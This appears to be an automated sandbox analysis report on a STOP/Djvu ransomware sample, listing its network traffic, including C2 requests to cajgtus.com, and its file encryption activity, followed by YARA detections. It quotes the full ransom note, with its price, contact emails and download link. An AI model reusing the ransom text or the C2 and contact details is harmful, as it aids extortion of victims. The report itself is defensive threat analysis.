          Source: global trafficHTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
          Source: global trafficHTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
          Source: global trafficHTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
          Source: global trafficHTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
          Source: global trafficHTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
          Source: global trafficHTTP traffic detected: GET /test2/get.php?pid=903E7F261711F85395E5CEFBF4173C54 HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: cajgtus.com
          Source: mU2p71KMss.exe, 00000007.00000003.2095073426.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: URL=http://www.facebook.com/ equals www.facebook.com (Facebook)
          Source: mU2p71KMss.exe, 00000007.00000003.2095368781.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: URL=http://www.twitter.com/ equals www.twitter.com (Twitter)
          Source: mU2p71KMss.exe, 00000007.00000003.2095490468.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: URL=http://www.youtube.com/ equals www.youtube.com (Youtube)
          Source: global trafficDNS traffic detected: DNS query: api.2ip.ua
          Source: global trafficDNS traffic detected: DNS query: cajgtus.com
          Source: mU2p71KMss.exe, 00000007.00000003.2036506866.000000000075F000.00000004.00000020.00020000.00000000.sdmp, mU2p71KMss.exe, 00000007.00000002.3243271467.0000000000764000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cajgtus.com/test2/get.php
          Source: mU2p71KMss.exe, 00000007.00000002.3243271467.0000000000754000.00000004.00000020.00020000.00000000.sdmp, mU2p71KMss.exe, 00000007.00000002.3243271467.00000000006C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cajgtus.com/test2/get.php?pid=903E7F261711F85395E5CEFBF4173C54
          Source: mU2p71KMss.exe, 00000007.00000002.3243271467.0000000000707000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cajgtus.com/test2/get.phprk
          Source: mU2p71KMss.exe, 00000000.00000002.1990128449.0000000005DD0000.00000040.00001000.00020000.00000000.sdmp, mU2p71KMss.exe, 00000001.00000002.2007683946.0000000000400000.00000040.00000400.00020000.00000000.sdmp, mU2p71KMss.exe, 00000004.00000002.2012565443.0000000005DE0000.00000040.00001000.00020000.00000000.sdmp, mU2p71KMss.exe, 00000005.00000002.2024778410.0000000000400000.00000040.00000400.00020000.00000000.sdmp, mU2p71KMss.exe, 00000006.00000002.2025228021.0000000005DC0000.00000040.00001000.00020000.00000000.sdmp, mU2p71KMss.exe, 00000007.00000002.3243111162.0000000000400000.00000040.00000400.00020000.00000000.sdmp, mU2p71KMss.exe, 00000009.00000002.2156207791.0000000005C80000.00000040.00001000.00020000.00000000.sdmp, mU2p71KMss.exe, 0000000A.00000002.2167150824.0000000000400000.00000040.00000400.00020000.00000000.sdmp, mU2p71KMss.exe, 0000000C.00000002.2241519623.0000000005E10000.00000040.00001000.00020000.00000000.sdmp, mU2p71KMss.exe, 0000000D.00000002.2252233144.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://https://ns1.kriston.ugns2.chalekin.ugns3.unalelath.ugns4.andromath.ug/Error
          Source: mU2p71KMss.exe, 00000007.00000003.2094960142.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.amazon.com/
          Source: mU2p71KMss.exe, 00000007.00000003.2095130817.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.google.com/
          Source: mU2p71KMss.exe, 00000007.00000003.2095187541.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.live.com/
          Source: mU2p71KMss.exe, 00000007.00000003.2095243165.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.nytimes.com/
          Source: mU2p71KMss.exe, 0000000D.00000002.2252233144.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://www.openssl.org/support/faq.html
          Source: mU2p71KMss.exe, 00000007.00000003.2095309712.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.reddit.com/
          Source: mU2p71KMss.exe, 00000007.00000003.2095368781.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.twitter.com/
          Source: mU2p71KMss.exe, 00000007.00000003.2095426359.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.wikipedia.com/
          Source: mU2p71KMss.exe, 00000007.00000003.2095490468.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.youtube.com/
          Source: mU2p71KMss.exe, 00000001.00000002.2009528237.00000000008F7000.00000004.00000020.00020000.00000000.sdmp, mU2p71KMss.exe, 00000001.00000003.2003059893.0000000000906000.00000004.00000020.00020000.00000000.sdmp, mU2p71KMss.exe, 00000005.00000003.2024120427.0000000000731000.00000004.00000020.00020000.00000000.sdmp, mU2p71KMss.exe, 00000005.00000003.2024457872.0000000000732000.00000004.00000020.00020000.00000000.sdmp, mU2p71KMss.exe, 00000005.00000002.2025188604.0000000000732000.00000004.00000020.00020000.00000000.sdmp, mU2p71KMss.exe, 00000007.00000002.3243271467.0000000000707000.00000004.00000020.00020000.00000000.sdmp, mU2p71KMss.exe, 00000007.00000003.2036117451.0000000000711000.00000004.00000020.00020000.00000000.sdmp, mU2p71KMss.exe, 0000000A.00000002.2167918166.0000000000768000.00000004.00000020.00020000.00000000.sdmp, mU2p71KMss.exe, 0000000A.00000003.2166629017.0000000000766000.00000004.00000020.00020000.00000000.sdmp, mU2p71KMss.exe, 0000000D.00000002.2252580072.00000000006C9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/
          Source: mU2p71KMss.exe, 0000000D.00000002.2252580072.00000000006C9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/.
          Source: mU2p71KMss.exe, 0000000D.00000002.2252580072.00000000006C9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/2
          Source: mU2p71KMss.exe, 0000000D.00000002.2252580072.00000000006C9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/D
          Source: mU2p71KMss.exe, 00000007.00000002.3243271467.0000000000707000.00000004.00000020.00020000.00000000.sdmp, mU2p71KMss.exe, 00000007.00000003.2036117451.0000000000711000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/K
          Source: mU2p71KMss.exe, 00000005.00000003.2024120427.0000000000731000.00000004.00000020.00020000.00000000.sdmp, mU2p71KMss.exe, 00000005.00000003.2024457872.0000000000732000.00000004.00000020.00020000.00000000.sdmp, mU2p71KMss.exe, 00000005.00000002.2025188604.0000000000732000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/a
          Source: mU2p71KMss.exe, 0000000A.00000002.2167737364.0000000000718000.00000004.00000020.00020000.00000000.sdmp, mU2p71KMss.exe, 0000000A.00000002.2167150824.0000000000400000.00000040.00000400.00020000.00000000.sdmp, mU2p71KMss.exe, 0000000A.00000002.2167918166.0000000000768000.00000004.00000020.00020000.00000000.sdmp, mU2p71KMss.exe, 0000000A.00000003.2166629017.0000000000766000.00000004.00000020.00020000.00000000.sdmp, mU2p71KMss.exe, 0000000C.00000002.2241519623.0000000005E10000.00000040.00001000.00020000.00000000.sdmp, mU2p71KMss.exe, 0000000D.00000002.2252580072.0000000000688000.00000004.00000020.00020000.00000000.sdmp, mU2p71KMss.exe, 0000000D.00000002.2252233144.0000000000400000.00000040.00000400.00020000.00000000.sdmp, mU2p71KMss.exe, 0000000D.00000002.2252580072.00000000006C9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/geo.json
          Source: mU2p71KMss.exe, 0000000A.00000002.2167737364.0000000000718000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/geo.json.7
          Source: mU2p71KMss.exe, 0000000D.00000002.2252580072.00000000006C9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/geo.json9
          Source: mU2p71KMss.exe, 00000001.00000002.2009528237.00000000008B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/geo.json=
          Source: mU2p71KMss.exe, 0000000A.00000002.2167737364.0000000000718000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/geo.jsonM
          Source: mU2p71KMss.exe, 00000005.00000002.2025045423.00000000006D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/geo.jsonSf
          Source: mU2p71KMss.exe, 0000000D.00000002.2252580072.0000000000688000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/geo.jsonb
          Source: mU2p71KMss.exe, 00000005.00000003.2024120427.0000000000731000.00000004.00000020.00020000.00000000.sdmp, mU2p71KMss.exe, 00000005.00000003.2024457872.0000000000732000.00000004.00000020.00020000.00000000.sdmp, mU2p71KMss.exe, 00000005.00000002.2025188604.0000000000732000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/geo.jsonhy
          Source: mU2p71KMss.exe, 00000001.00000002.2009528237.00000000008B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/geo.jsonmp
          Source: mU2p71KMss.exe, 00000005.00000002.2025045423.00000000006D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/geo.jsonpTf
          Source: mU2p71KMss.exe, 00000005.00000002.2025045423.00000000006D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/geo.jsonqS
          Source: mU2p71KMss.exe, 0000000A.00000002.2167737364.0000000000718000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/geo.jsons
          Source: mU2p71KMss.exe, 0000000A.00000002.2167737364.0000000000718000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/geo.jsons:$
          Source: mU2p71KMss.exe, 00000005.00000002.2025045423.00000000006D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/geo.jsont
          Source: mU2p71KMss.exe, 00000005.00000002.2025045423.00000000006D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/geo.jsonyS
          Source: mU2p71KMss.exe, 00000007.00000003.2089780619.00000000007B1000.00000004.00000020.00020000.00000000.sdmp, mU2p71KMss.exe, 00000007.00000002.3243271467.0000000000754000.00000004.00000020.00020000.00000000.sdmp, mU2p71KMss.exe, 00000007.00000002.3243271467.0000000000764000.00000004.00000020.00020000.00000000.sdmp, _README.txt.7.dr, _README.txt0.7.drString found in binary or memory: https://wetransfer.com/downloads/54cdfd152fe98eedb628a1f4ddb7076420240421150208/403a27
          Source: mU2p71KMss.exe, 00000007.00000002.3243271467.00000000007A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wetransfer.com/downloadsVn
          Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
          Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
          Source: unknownHTTPS traffic detected: 104.21.65.24:443 -> 192.168.2.5:49704 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.21.65.24:443 -> 192.168.2.5:49705 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.21.65.24:443 -> 192.168.2.5:49706 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.21.65.24:443 -> 192.168.2.5:49708 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.21.65.24:443 -> 192.168.2.5:49716 version: TLS 1.2
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 1_2_004822E0 CreateDCA,CreateCompatibleDC,GetDeviceCaps,GetDeviceCaps,GetDeviceCaps,CreateCompatibleBitmap,SelectObject,GetObjectA,BitBlt,GetBitmapBits,SelectObject,DeleteObject,DeleteDC,DeleteDC,DeleteDC,1_2_004822E0

          Spam, unwanted Advertisements and Ransom Demands

          barindex
          Found ransom note / readme
          Source: C:\Users\user\AppData\Local\VirtualStore\_README.txtDropped file: ATTENTION!Don't worry, you can return all your files!All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.The only method of recovering files is to purchase decrypt tool and unique key for you.This software will decrypt all your encrypted files.What guarantees you have?You can send one of your encrypted file from your PC and we decrypt it for free.But we can decrypt only 1 file for free. File must not contain valuable information.Do not ask assistants from youtube and recovery data sites for help in recovering your data.They can use your free decryption quota and scam you.Our contact is emails in this text document only.You can get and look video overview decrypt tool:https://wetransfer.com/downloads/54cdfd152fe98eedb628a1f4ddb7076420240421150208/403a27Price of private key and decrypt software is $999.Discount 50% available if you contact us first 72 hours, that's price for you is $499.Please note that you'll never restore your data without payment.Check your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours.To get this software you need write on our e-mail:support@freshingmail.topReserve e-mail address to contact us:datarestorehelpyou@airmail.ccYour personal ID:0864PsawqS8JH27WdrW6kuFkS6UwG9Yu6KR0DViv5JyVmKOoKEJump to dropped file
          Yara detected Babuk Ransomware
          Source: Yara matchFile source: Process Memory Space: mU2p71KMss.exe PID: 2164, type: MEMORYSTR
          Yara detected Djvu Ransomware
          Source: Yara matchFile source: 13.2.mU2p71KMss.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.mU2p71KMss.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.2.mU2p71KMss.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.mU2p71KMss.exe.5de15a0.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.2.mU2p71KMss.exe.5c815a0.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.mU2p71KMss.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.mU2p71KMss.exe.5dd15a0.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.mU2p71KMss.exe.5dc15a0.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.mU2p71KMss.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.2.mU2p71KMss.exe.5c815a0.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 12.2.mU2p71KMss.exe.5e115a0.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.mU2p71KMss.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 13.2.mU2p71KMss.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.mU2p71KMss.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.mU2p71KMss.exe.5dc15a0.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.mU2p71KMss.exe.5dd15a0.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.2.mU2p71KMss.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 12.2.mU2p71KMss.exe.5e115a0.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.mU2p71KMss.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.mU2p71KMss.exe.5de15a0.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000001.00000002.2007683946.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.2252233144.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.2167150824.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.2025228021.0000000005DC0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.2012565443.0000000005DE0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.1990128449.0000000005DD0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2024778410.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.3243111162.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.2156207791.0000000005C80000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000002.2241519623.0000000005E10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: mU2p71KMss.exe PID: 348, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: mU2p71KMss.exe PID: 2716, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: mU2p71KMss.exe PID: 1896, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: mU2p71KMss.exe PID: 5968, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: mU2p71KMss.exe PID: 2828, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: mU2p71KMss.exe PID: 2164, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: mU2p71KMss.exe PID: 5524, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: mU2p71KMss.exe PID: 4748, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: mU2p71KMss.exe PID: 4144, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: mU2p71KMss.exe PID: 2616, type: MEMORYSTR
          Modifies existing user documents (likely ransomware behavior)
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exeFile moved: C:\Users\user\Desktop\UNKRLCVOHV.mp3Jump to behavior
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exeFile deleted: C:\Users\user\Desktop\UNKRLCVOHV.mp3Jump to behavior
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exeFile moved: C:\Users\user\Desktop\EIVQSAOTAQ.jpgJump to behavior
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exeFile deleted: C:\Users\user\Desktop\EIVQSAOTAQ.jpgJump to behavior
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exeFile moved: C:\Users\user\Desktop\EEGWXUHVUG\EEGWXUHVUG.docxJump to behavior
          Writes a notice file (html or txt) to demand a ransom
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exeFile dropped: C:\Users\user\AppData\Local\VirtualStore\_README.txt -> decrypt tool and unique key for you.this software will decrypt all your encrypted files.what guarantees you have?you can send one of your encrypted file from your pc and we decrypt it for free.but we can decrypt only 1 file for free. file must not contain valuable information.do not ask assistants from youtube and recovery data sites for help in recovering your data.they can use your free decryption quota and scam you.our contact is emails in this text document only.you can get and look video overview decrypt tool:https://wetransfer.com/downloads/54cdfd152fe98eedb628a1f4ddb7076420240421150208/403a27price of private key and decrypt software is $999.discount 50% available if you contact us first 72 hours, that's price for you is $499.please note that you'll never restore your data without payment.check your e-mail "spam" or "junk" folder if you don't get answer more than 6 hours.to get this software you need write on our e-mail:support@freshingmail.topreserve e-mail addressJump to dropped file
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exeFile dropped: C:\Users\user\_README.txt -> decrypt tool and unique key for you.this software will decrypt all your encrypted files.what guarantees you have?you can send one of your encrypted file from your pc and we decrypt it for free.but we can decrypt only 1 file for free. file must not contain valuable information.do not ask assistants from youtube and recovery data sites for help in recovering your data.they can use your free decryption quota and scam you.our contact is emails in this text document only.you can get and look video overview decrypt tool:https://wetransfer.com/downloads/54cdfd152fe98eedb628a1f4ddb7076420240421150208/403a27price of private key and decrypt software is $999.discount 50% available if you contact us first 72 hours, that's price for you is $499.please note that you'll never restore your data without payment.check your e-mail "spam" or "junk" folder if you don't get answer more than 6 hours.to get this software you need write on our e-mail:support@freshingmail.topreserve e-mail addressJump to dropped file

          System Summary

          barindex
          Malicious sample detected (through community Yara rule)
          Source: 13.2.mU2p71KMss.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: 13.2.mU2p71KMss.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
          Source: 5.2.mU2p71KMss.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: 5.2.mU2p71KMss.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
          Source: 10.2.mU2p71KMss.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: 10.2.mU2p71KMss.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
          Source: 4.2.mU2p71KMss.exe.5de15a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: 4.2.mU2p71KMss.exe.5de15a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
          Source: 9.2.mU2p71KMss.exe.5c815a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: 9.2.mU2p71KMss.exe.5c815a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
          Source: 1.2.mU2p71KMss.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: 1.2.mU2p71KMss.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
          Source: 0.2.mU2p71KMss.exe.5dd15a0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: 0.2.mU2p71KMss.exe.5dd15a0.1.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
          Source: 6.2.mU2p71KMss.exe.5dc15a0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: 6.2.mU2p71KMss.exe.5dc15a0.1.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
          Source: 5.2.mU2p71KMss.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: 5.2.mU2p71KMss.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
          Source: 9.2.mU2p71KMss.exe.5c815a0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: 9.2.mU2p71KMss.exe.5c815a0.1.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
          Source: 12.2.mU2p71KMss.exe.5e115a0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: 12.2.mU2p71KMss.exe.5e115a0.1.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
          Source: 7.2.mU2p71KMss.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: 7.2.mU2p71KMss.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
          Source: 13.2.mU2p71KMss.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: 13.2.mU2p71KMss.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
          Source: 1.2.mU2p71KMss.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: 1.2.mU2p71KMss.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
          Source: 6.2.mU2p71KMss.exe.5dc15a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: 6.2.mU2p71KMss.exe.5dc15a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
          Source: 0.2.mU2p71KMss.exe.5dd15a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: 0.2.mU2p71KMss.exe.5dd15a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
          Source: 10.2.mU2p71KMss.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: 10.2.mU2p71KMss.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
          Source: 12.2.mU2p71KMss.exe.5e115a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: 12.2.mU2p71KMss.exe.5e115a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
          Source: 7.2.mU2p71KMss.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: 7.2.mU2p71KMss.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
          Source: 4.2.mU2p71KMss.exe.5de15a0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: 4.2.mU2p71KMss.exe.5de15a0.1.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
          Source: 00000001.00000002.2007683946.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: 00000001.00000002.2007683946.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects STOP ransomware Author: ditekSHen
          Source: 00000006.00000002.2025120505.0000000004431000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
          Source: 0000000D.00000002.2252233144.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: 0000000D.00000002.2252233144.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects STOP ransomware Author: ditekSHen
          Source: 00000000.00000002.1990031031.0000000004388000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
          Source: 00000009.00000002.2156092371.000000000444D000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
          Source: 0000000A.00000002.2167150824.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: 0000000A.00000002.2167150824.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects STOP ransomware Author: ditekSHen
          Source: 00000006.00000002.2025228021.0000000005DC0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: 00000004.00000002.2012495232.00000000044A7000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
          Source: 00000004.00000002.2012565443.0000000005DE0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: 0000000C.00000002.2241428739.00000000044D6000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
          Source: 00000000.00000002.1990128449.0000000005DD0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: 00000005.00000002.2024778410.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
